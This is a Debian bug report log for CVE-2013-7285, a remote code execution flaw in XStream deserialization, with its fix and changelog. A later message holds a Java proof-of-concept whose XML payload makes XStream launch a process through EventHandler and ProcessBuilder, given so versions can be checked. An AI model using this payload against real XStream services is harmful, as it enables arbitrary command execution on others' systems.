libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream

Related Vulnerabilities: CVE-2013-7285  

Debian Bug report logs - #734821
libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream

Reported by: Salvatore Bonaccorso <>

Date: Fri, 10 Jan 2014 02:54:02 UTC

Severity: grave

Tags: security, upstream

Done: Emmanuel Bourg <>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox

Report forwarded to,,,, Debian Java Maintainers <>:
Bug#734821; Package libxstream-java. (Fri, 10 Jan 2014 02:54:06 GMT) (full text, mbox, link).

Acknowledgement sent to Salvatore Bonaccorso <>:
New Bug report received and forwarded. Copy sent to,,, Debian Java Maintainers <>. (Fri, 10 Jan 2014 02:54:06 GMT) (full text, mbox, link).

Message #5 received at (full text, mbox, reply):

From: Salvatore Bonaccorso <>
To: Debian Bug Tracking System <>
Subject: libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream
Date: Fri, 10 Jan 2014 03:51:22 +0100
Package: libxstream-java
Severity: grave
Tags: security upstream


the following vulnerability was published for libxstream-java.

remote code execution via deserialization in XStream

See also [1] for the original report. [3] contains an initial patch
which was commited.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:


Please adjust the affected versions in the BTS as needed.


Reply sent to Emmanuel Bourg <>:
You have taken responsibility. (Wed, 12 Mar 2014 13:36:23 GMT) (full text, mbox, link).

Notification sent to Salvatore Bonaccorso <>:
Bug acknowledged by developer. (Wed, 12 Mar 2014 13:36:23 GMT) (full text, mbox, link).

Message #10 received at (full text, mbox, reply):

From: Emmanuel Bourg <>
Subject: Bug#734821: fixed in libxstream-java 1.4.7-1
Date: Wed, 12 Mar 2014 13:33:33 +0000
Source: libxstream-java
Source-Version: 1.4.7-1

We believe that the bug you reported is fixed in the latest version of
libxstream-java, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
Emmanuel Bourg <> (supplier of updated libxstream-java package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing

Hash: SHA1

Format: 1.8
Date: Wed, 12 Mar 2014 14:06:33 +0100
Source: libxstream-java
Binary: libxstream-java
Architecture: source all
Version: 1.4.7-1
Distribution: unstable
Urgency: low
Maintainer: Debian Java Maintainers <>
Changed-By: Emmanuel Bourg <>
 libxstream-java - Java library to serialize objects to XML and back again
Closes: 734821
 libxstream-java (1.4.7-1) unstable; urgency=low
   * New upstream release
     - Fixes CVE-2013-7285 (Closes: #734821)
     - Added a dependency on libjdom2-java
   * Standards-Version updated to 3.9.5 (no changes)
   * Use XZ compression for the upstream tarball
   * Build depend on debhelper >= 9
   * debian/copyright: Updated to the Copyright Format 1.0
 684b6cc0d8edae45924832e4eedda12c780cb624 2343 libxstream-java_1.4.7-1.dsc
 329882aa8cb64b0ec729d840453a27608f59aba1 397328 libxstream-java_1.4.7.orig.tar.xz
 243eb22bca15817712111ca2645a867377ef2a8e 5960 libxstream-java_1.4.7-1.debian.tar.xz
 a41e3fee90ff5d6361d0538a84ea8afdcf32e33d 583860 libxstream-java_1.4.7-1_all.deb
 8698da0a6520f6ab54efadad2e98c5d5e51f37faf0506b155208db85304bc3f2 2343 libxstream-java_1.4.7-1.dsc
 33aeb2217d2dd3734abcd6cc6f3d3283fed2646e4cbc79102d5237a099738eed 397328 libxstream-java_1.4.7.orig.tar.xz
 08c314aa33cb9164620110466cbe106369aedcc1e8718f1551bcce347c63004a 5960 libxstream-java_1.4.7-1.debian.tar.xz
 5a191aa57415acd1c5fb2f6af53ea7f751c615abb8bf9b00a9070f58cb19d322 583860 libxstream-java_1.4.7-1_all.deb
 c8d6431cf68e71eda78e67e950e079aa 2343 java optional libxstream-java_1.4.7-1.dsc
 09de7d2175bdc6c002aa681e3004d8d6 397328 java optional libxstream-java_1.4.7.orig.tar.xz
 3e72fa42334aaed7ec2248a9ffd3ccf1 5960 java optional libxstream-java_1.4.7-1.debian.tar.xz
 72573fdd9319ffae8b1d9dafd65e2c02 583860 java optional libxstream-java_1.4.7-1_all.deb

Version: GnuPG v1


Information forwarded to, Debian Java Maintainers <>:
Bug#734821; Package libxstream-java. (Fri, 10 Oct 2014 09:21:14 GMT) (full text, mbox, link).

Acknowledgement sent to Sébastien Delafond <>:
Extra info received and forwarded to list. Copy sent to Debian Java Maintainers <>. (Fri, 10 Oct 2014 09:21:14 GMT) (full text, mbox, link).

Message #15 received at (full text, mbox, reply):

From: Sébastien Delafond <>
Subject: 734821
Date: Fri, 10 Oct 2014 11:19:58 +0200
notfixed 734821 1.4.7-1

This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.

If anyone is interested in verifying this, the following code can be run
against the JARs present at

  import com.thoughtworks.xstream.XStream;

  /* Thanks to </pwntester> for the PoC
   * */
  public class XStreamExploit {
      public static void main(String[] args) throws IOException   {
          String process = "/usr/bin/xeyes";
          String payload = "<sorted-set>" +
              "<string>foo</string>" +
              "<dynamic-proxy>" +
              "<interface>java.lang.Comparable</interface>" +
              "<handler class=\"java.beans.EventHandler\">" +
              " <target class=\"java.lang.ProcessBuilder\">" +
              " <command>" +
              " <string>" + process + "</string>" +
              " </command>" +
              " </target>" +
              " <action>start</action>" +
              "</handler>" +
              "</dynamic-proxy>" +
          XStream xstream = new XStream(new DomDriver());



No longer marked as fixed in versions libxstream-java/1.4.7-1. Request was from Sébastien Delafond <> to (Fri, 10 Oct 2014 09:21:22 GMT) (full text, mbox, link).

Bug archived. Request was from Debbugs Internal Request <> to (Sat, 08 Nov 2014 07:26:44 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <>. Last modified: Wed Jun 19 16:41:24 2019; Machine Name: beach

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.